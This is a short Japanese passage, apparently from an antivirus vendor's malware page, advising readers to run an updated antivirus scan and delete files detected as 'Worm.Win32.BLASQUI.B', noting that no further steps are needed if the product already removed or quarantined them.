最新のバージョン（エンジン、パターンファイル）を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Worm.Win32.BLASQUI.B」と検出したファイルはすべて削除してください。検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。

ご利用はいかがでしたか？　アンケートにご協力ください